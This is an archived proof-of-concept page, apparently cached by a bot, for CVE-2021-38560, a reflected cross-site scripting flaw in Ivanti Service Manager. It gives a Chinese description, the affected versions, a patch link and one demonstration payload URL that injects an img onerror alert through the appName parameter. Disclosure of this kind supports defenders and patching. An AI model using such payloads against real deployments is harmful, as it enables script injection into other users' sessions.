CVE-2021-38560 PoC — Ivanti Service Manager 跨站脚本漏洞

Source

https://github.com/os909/iVANTI-CVE-2021-38560

Associated Vulnerability

Title:Ivanti Service Manager 跨站脚本漏洞 (CVE-2021-38560)
Description:Ivanti Service Manager是美国Ivanti公司的一个服务管理器。可帮助企业满足当今对服务交付自动化工作流程的监管和技术需求。 Ivanti Service Manager 2021.1 存在跨站脚本漏洞，该漏洞允许通过与ConfigDB调用相关联的appName参数进行反射跨站脚本，例如RelocateAttachments.aspx。

Readme

# iVANTI-CVE-2021-38560
> Ivanti Service Manager 2021.1 infected with reflected XSS via the appName parameter associated with
> ConfigDB calls, such as in RelocateAttachments.aspx.
> 
> Vulnerability Type:
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> Vendor of Product:
> IVANTI
>
> ------------------------------------------
>
> Affected Product Versions:
> Service Manager - (=<2021.3)
>
> ------------------------------------------
>
> Payload:
>
> http://localhost/HEAT/maintenance/RelocateAttachments.aspx?appId=2-IVNTI-APP02.localhost&appName=%27"><img%20src=1%20onerror=alert(1)>ConfigDB
>
> ------------------------------------------
> 
> Patched Version:
> https://forums.ivanti.com/s/article/Ivanti-Neurons-for-ITSM-ITAM-v2021-4-Download?ui-force-components-controllers-recordGlobalValueProvider.RecordGvp.getRecord=1

File Snapshot


 [4.0K]  /data/pocs/a8169cd03230f0e403fdab70cf7091c123c5390f
└── [ 863]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!